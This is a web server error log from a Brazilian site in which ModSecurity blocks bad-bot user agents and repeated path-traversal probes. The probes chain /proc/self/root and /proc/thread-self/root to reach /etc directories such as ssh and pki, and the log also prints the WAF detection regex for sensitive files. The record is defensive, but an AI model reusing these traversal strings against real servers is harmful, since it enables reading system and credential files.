[Thu Mar 19 14:02:22.814107 2026] [:error] [pid 7032:tid 140411733534464] [client 74.7.228.61:53998] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwsHnOoiBhmblfxy7FRQAAAAIE"]
[Thu Mar 19 14:02:35.145782 2026] [proxy_fcgi:error] [pid 26799:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:39316] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:02:38.243488 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.244.43:35564] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwsLgkwaGbbGflqUZDhpgAAAMs"]
[Thu Mar 19 14:02:42.234911 2026] [mime_magic:error] [pid 7032:tid 140411607643904] (70014)End of file found: [client 57.141.18.109:47144] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 14:02:47.713879 2026] [core:alert] [pid 26799:tid 140411616036608] [client 57.141.18.105:47276] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 14:02:49.154012 2026] [mime_magic:error] [pid 8557:tid 140411574073088] (70014)End of file found: [client 74.7.241.31:58544] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/lib/systemd
[Thu Mar 19 14:02:55.445005 2026] [mime_magic:error] [pid 31803:tid 140411716749056] (70014)End of file found: [client 57.141.18.15:47534] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 14:02:58.128849 2026] [proxy_fcgi:error] [pid 17653:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:40416] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:03:19.225818 2026] [core:alert] [pid 17653:tid 140411624429312] [client 57.141.18.46:48682] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 14:03:21.861827 2026] [proxy_fcgi:error] [pid 27293:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:41338] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:03:29.713367 2026] [:error] [pid 7893:tid 140411708356352] [client 74.7.243.128:40140] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwsYRCii7xarUs8iHYBIgAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:03:44.134157 2026] [proxy_fcgi:error] [pid 7032:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:42244] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:03:49.086646 2026] [:error] [pid 7235:tid 140411716749056] [client 74.7.243.128:43598] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwsdfqxLDW4GITHUkSBAQAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:04:11.122041 2026] [proxy_fcgi:error] [pid 26799:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:43466] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:04:14.620475 2026] [:error] [pid 7235:tid 140411658000128] [client 74.7.243.128:36896] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwsjvqxLDW4GITHUkSBHwAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:04:28.899178 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.243.128:51918] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwsnPu8EFLIOrSqIpvBVQAAAlI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:04:32.165907 2026] [proxy_fcgi:error] [pid 14269:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:44402] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:04:39.935393 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:41704] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwsp9a6ubjKNq_cu4ZvzwAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:04:52.528502 2026] [:error] [pid 7545:tid 140411582465792] [client 74.7.243.128:52636] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwstH8B84UptSoTJtYmzQAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:04:54.133843 2026] [proxy_fcgi:error] [pid 15826:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:45386] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:04:56.853225 2026] [mime_magic:error] [pid 27293:tid 140411624429312] (70014)End of file found: [client 57.141.18.95:51566] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 14:04:59.133401 2026] [:error] [pid 7235:tid 140411658000128] [client 74.7.243.128:52768] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwsu_qxLDW4GITHUkSBMQAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:05:16.133789 2026] [proxy_fcgi:error] [pid 14269:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:46154] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:05:38.335255 2026] [:error] [pid 17887:tid 140411674785536] [client 74.7.243.128:41106] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abws4gkwaGbbGflqUZDh_QAAAMg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:05:40.425058 2026] [proxy_fcgi:error] [pid 17887:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:47092] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:05:49.686884 2026] [:error] [pid 30077:tid 140411733534464] [client 74.7.243.128:53178] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abws7fu8EFLIOrSqIpvBcAAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:06:04.997839 2026] [proxy_fcgi:error] [pid 30077:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:48136] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:06:17.508257 2026] [:error] [pid 7032:tid 140411733534464] [client 74.7.243.128:51846] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwtCXOoiBhmblfxy7FRxQAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:06:30.417082 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.243.128:55670] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwtFsdf6f5d65gmYZSS4QAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:06:32.245793 2026] [proxy_fcgi:error] [pid 7032:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:49208] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:06:34.723066 2026] [:error] [pid 27293:tid 140411565680384] [client 74.7.243.128:47438] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwtGv-YZRR_7pZ7nDKkOAAAA9U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:07:04.129803 2026] [proxy_fcgi:error] [pid 15826:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:50528] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:07:21.617956 2026] [mime_magic:error] [pid 30077:tid 140411574073088] (70014)End of file found: [client 57.141.18.34:54350] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 14:07:24.203000 2026] [:error] [pid 7032:tid 140411590858496] [client 74.7.228.61:43970] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwtTHOoiBhmblfxy7FR2QAAAJI"]
[Thu Mar 19 14:07:25.290695 2026] [:error] [pid 7032:tid 140411599251200] [client 74.7.243.128:49842] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwtTXOoiBhmblfxy7FR2gAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:07:34.121798 2026] [proxy_fcgi:error] [pid 17653:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:51670] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:07:34.663578 2026] [:error] [pid 7545:tid 140411548894976] [client 74.7.243.128:51720] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwtVn8B84UptSoTJtYnGAAAAZc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:07:37.018406 2026] [:error] [pid 14269:tid 140411725141760] [client 74.7.243.128:60346] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwtWQbLMZ6AikZjR9V2oAAAAAI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:07:37.216858 2026] [:error] [pid 14269:tid 140411616036608] [client 74.7.243.128:60346] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwtWQbLMZ6AikZjR9V2oQAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:07:40.599541 2026] [:error] [pid 7545:tid 140411674785536] [client 74.7.243.128:41276] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwtXH8B84UptSoTJtYnGgAAAYg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:07:40.752698 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.244.43:45674] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwtXOoXxyEfFpUF8f8lvwAAAVA"]
